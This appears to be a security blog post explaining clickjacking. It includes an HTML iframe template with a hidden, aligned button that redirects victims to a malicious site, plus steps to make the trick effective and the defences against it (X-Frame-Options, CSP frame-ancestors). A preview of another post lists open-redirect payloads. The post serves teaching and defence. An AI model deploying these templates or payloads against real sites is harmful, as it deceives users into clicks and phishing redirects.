What is Clickjacking

 Clickjacking



  • It is a web based vulnerability which allows hacker to embed a webpage of a domain on hacker's fake webpage.
  • Now the fake webpage can works like a legitimate one and become very complex to identify that it is a fake webpage.
  • It is also known as UI Redressing. 
  • It can be achieved by using iframe.

Things to Know:

X-frame:

    It is a http security header that controls iframe. It is used to specify whether a browser is allowed to render a page in iframe.

Content Security Policy (CSP):

    It is a security standard which allows the developer to add additional security to the website. It helps developer to restrict loading web resource like HTML, CSS, JS into other webpage.

iframe:

    It is a html element that loads another html element inside a web page.

HTML template with Iframe to exploit clickjacking

<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="UTF-8">
<title>I Frame</title>
<style>
    html, body {
        height: 100%;
        margin: 0;
    }
    iframe {
        width: 100%;
        height: 100%;
        border: none; /* Optional: To remove the default iframe border */
    }
    .center-button {
        position: absolute;
        top: 87%;  /* Adjust this value to move the button down */
        left: 25%;
        transform: translate(-50%, -50%);
        background-color: green;
        border: 2px solid black;
        color: black;
        padding: 20px 20px; /* Adjust the size of the button*/
        font-size: 26px;
        cursor: pointer;
    }
</style>
</head>
<body>
<iframe src="url of the targeted domain"></iframe>
<button class="center-button" onclick="window.location.href='malicious site to which the victim has to redirected'">Click</button>
</body>
</html>

Steps to make the above template effective

  • Make sure that the targeted site is specified inside iframe.
  • Make sure that the malicious site to which the victim has to be redirected is specified inside button. 
  • Make sure that the button is adjusted and align with the button present in the legitimate webpage by changing the percentage in top and left.
  • Make sure that the button is made transparent.

Methods to prevent clickjacking:

X-farme-options: Same Origin = domain.com
The x-frame option with same origin only allow the webpage with specified domain to iframe the sight. It checks the origin of the frame and the origin of the top most window.

Steps to check the x-frame option of a website:
  • Open your website navigate to the targeted domain. 
  • Inspect the webpage and navigate to the network tab of the inspector.
  • reload the webpage and search for x-frame



Content-security-policy : frame-ancestors "self" domain.com
Setting CSP frame-ancestor with self keyword will allow the webpage with specified domain to iframe the sight. CSP security standard is not supported in internet explorer and safari browser with version <= 10

Steps to check the CSP header of a website:
  • Open your website navigate to the targeted domain. 
  • Inspect the webpage and navigate to the network tab of the inspector.
  • reload the webpage and search for content-security-policy


Comments

Post a Comment

Popular posts from this blog

Steps to fix the broken base repo in CentOS 7

Image
The error "could not find valid base url for repo: base/7/x86_64" in CentOS usually occurs because the YUM package manager cannot access the repository URLs it needs to download packages. Steps to solve the issue: Check whether the device is connected to internet. Open terminal  ping www.google.com  to test the stability of the internet and to check whether you can reach the web server. If the server is reachable then we can confirm that the problem is with base repo of the operating system. Locate to the path /etc/yum.repos.d using change directory  command. cd /etc/yum.repos.d. Open the file CentOS-Base.repo using vim text editor sudo vim CentOS-Base.repo. Use esc+:%d to clean the entire content present in the file and add the repo given below. # CentOS-Base.repo # # The mirror system uses the connecting IP address of the client and the # update status of each mirror to pick mirrors that are updated to and # geographically close to the client. You should use this f...
Read more

Open Redirect Vulnerability

Image
Open Redirect:     An open redirect is a type of web vulnerability where a website has a parameter that can redirect a user to an external URL without proper validation. This can be exploited by attackers to redirect users to malicious sites, phishing pages, or unwanted content. Risks of Open Redirects: Phishing Attacks: Attackers can use open redirects to craft convincing phishing URLs that appear to come from a trusted site. Malware Distribution: Users can be redirected to sites that host malware, increasing the risk of infections. Loss of Trust: Users may lose trust in a website that unknowingly redirects them to malicious or unwanted content. Payloads: Example: https://cyberguardian40.blogspot.com /redirect?url=https://www.google.com ?url=http://{target} ?url=$2f%2f{target} ?next=http://{target} /redirect/{target} ?view=/{target} /login?to={target} Remediation: Remove the redirection function from the application, and replace links to it with direct links to the relev...
Read more